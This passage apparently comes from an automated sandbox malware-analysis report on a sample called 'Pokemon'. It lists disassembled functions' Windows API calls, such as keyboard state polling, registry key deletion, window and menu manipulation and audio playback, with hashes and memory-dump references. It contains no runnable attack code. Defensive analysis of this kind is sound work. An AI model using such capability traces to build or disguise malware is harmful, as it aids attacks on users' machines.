• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                                      • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                      • Opcode ID: bc902fb36898c840da67b961ab2c22113718ccfdb74d826aecc448c908d07bab
                                                                                                                                                                                                                                                                                      • Instruction ID: 7ed35896a70e8ae89cbc5953513c72ef5d7ffab8ef0a4c5cee85decb77b865fb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc902fb36898c840da67b961ab2c22113718ccfdb74d826aecc448c908d07bab
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35B1AC31600229EFDF18CF68D9847AE7BF2FF44704F588069ED44AB295D770A9A0CB61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 000F52E6
                                                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 000F5328
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000F5339
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 000F5345
                                                                                                                                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 000F537A
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 000F53B2
                                                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 000F53EB
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 000F5445
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 000F5477
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000F54EF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                      • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                      • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                      • Opcode ID: 35f980754c152e538377b42d01df5a976413e5a0e24526932eebedd204acb93b
                                                                                                                                                                                                                                                                                      • Instruction ID: 638d16b831e771912728cdaa6d6c17d34e381d48c38cc48b742cf3c7f6854aa7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35f980754c152e538377b42d01df5a976413e5a0e24526932eebedd204acb93b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B91D171104A0AABDB54CF24DD94BBAB7E9FF40306F004519FB8682891EB31ED56DB81
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001297B6
                                                                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 001297C6
                                                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 001297D1
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00129879
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0012992B
                                                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00129948
                                                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00129958
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0012998A
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001299CC
                                                                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001299FD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 1086fc653536e9984eec5274c20a6ac15ef836f763b41b013a4e6b3c8493bcdd
                                                                                                                                                                                                                                                                                      • Instruction ID: 0c3783d6ddd1cb6420ba10b19218aa67f807150f42cb8e87a055c5b7e04fb4f5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1086fc653536e9984eec5274c20a6ac15ef836f763b41b013a4e6b3c8493bcdd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17810971504325AFDB14CF28EC84AAB7BE8FF89314F04092DF98597291D770D965CBA1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(001629C0,000000FF,00000000,00000030), ref: 000FC973
                                                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(001629C0,00000004,00000000,00000030), ref: 000FC9A8
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 000FC9BA
                                                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 000FCA00
                                                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 000FCA1D
                                                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 000FCA49
                                                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 000FCA90
                                                                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000FCAD6
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000FCAEB
                                                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000FCB0C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 92792db4399e94f2d6e037957b9e93922efbfbb637b5b1ebbd519bdf392a8f8c
                                                                                                                                                                                                                                                                                      • Instruction ID: 537d9dd9c8ffba768da8d6e0e48bde178f76cd1ff83a613e46a60d9bfb40c18c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92792db4399e94f2d6e037957b9e93922efbfbb637b5b1ebbd519bdf392a8f8c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9361AE7090024DAFEF21CF64DA8AEFE7BB8FB05348F040015EA11A3A51D771AD51EB61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 000FE4D4
                                                                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 000FE4FA
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FE504
                                                                                                                                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 000FE554
                                                                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 000FE570
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                      • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                      • Opcode ID: 509c166a44da2fb1119e187e47a9983b7b7a09ed121c2e7cf4fdb373c7e5e5aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 927fe3f0c60126e817117dd6451168779e48893435492c930502110147c27c10
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 509c166a44da2fb1119e187e47a9983b7b7a09ed121c2e7cf4fdb373c7e5e5aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A341F5729002187AEB14AB64EC47EFF77ACDF55B20F104469FA00E6093FF749B11A2A5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0011D6C4
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0011D6ED
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0011D7A8
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0011D70A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0011D71D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0011D72F
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0011D765
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0011D788
                                                                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0011D753
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 000FEFCB
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AF215: timeGetTime.WINMM(?,?,000FEFEB), ref: 000AF219
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 000FEFF8
                                                                                                                                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 000FF01C
                                                                                                                                                                                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 000FF03E
                                                                                                                                                                                                                                                                                      • SetActiveWindow.USER32 ref: 000FF05D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000FF06B
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 000FF08A
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 000FF095
                                                                                                                                                                                                                                                                                      • IsWindow.USER32 ref: 000FF0A1
                                                                                                                                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 000FF0B2
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000FF374
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000FF38A
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000FF39B
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000FF3AD
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000FF3BE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                      • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 000FA9D9
                                                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 000FAA44
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 000FAA64
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 000FAA7B
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 000FAAAA
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 000FAABB
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 000FAAE7
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 000FAAF5
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 000FAB1E
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 000FAB2C
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 000FAB55
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 000FAB63
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 000F6649
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000F6662
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 000F66C0
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 000F66D0
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000F66E2
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 000F6736
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 000F6744
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000F6756
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 000F6798
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 000F67AB
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000F67C1
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 000F67CE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00091488,?,00000000,?,?,?,?,0009145A,00000000,?), ref: 00091865
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00091521
                                                                                                                                                                                                                                                                                      • KillTimer.USER32(00000000,?,?,?,?,0009145A,00000000,?), ref: 000915BB
                                                                                                                                                                                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 000D29B4
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0009145A,00000000,?), ref: 000D29E2
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0009145A,00000000,?), ref: 000D29F9
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0009145A,00000000), ref: 000D2A15
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000D2A27
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 641708696-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00092234: GetWindowLongW.USER32(?,000000EB), ref: 00092242
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00092152
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,000E0D31,00000001,0000138C,00000001,00000000,00000001,?,0010EEAE,00162430), ref: 000FA091
                                                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,000E0D31,00000001), ref: 000FA09A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,000E0D31,00000001,0000138C,00000001,00000000,00000001,?,0010EEAE,00162430,?), ref: 000FA0BC
                                                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,000E0D31,00000001), ref: 000FA0BF
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000FA1E0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                      • API String ID: 747408836-2268648507
